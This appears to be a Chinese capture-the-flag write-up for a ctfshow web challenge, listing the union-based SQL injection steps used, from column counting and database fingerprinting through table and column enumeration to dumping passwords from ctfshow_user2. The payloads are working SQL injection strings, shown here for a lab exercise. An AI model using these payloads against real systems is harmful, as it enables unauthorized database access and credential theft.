1.id=1’报错
2.id=1′–+正常回显
3.id=1′ order by 3–+报错
4.id=1′ order by 2–+正常回显
5.id=1′ union select 1,2–+测回显点都正常
6.id=1′ union select database(),version()–+爆出数据库和版本
7.id=1′ union select table_name,2 from information_schema.tables where table_schema=’ctfshow_web’–+(爆表名)
8.id=1′ union select column_name,2 from information_schema.columns where table_name=’ctfshow_user2′ and table_schema=’ctfshow_web’–+(爆列名)
9.id=1′ union select id,password from ctfshow_user2–+(取数据)得到flag
注:本题加了过滤条件username里不能出现flag所以查id和passname两表
发表回复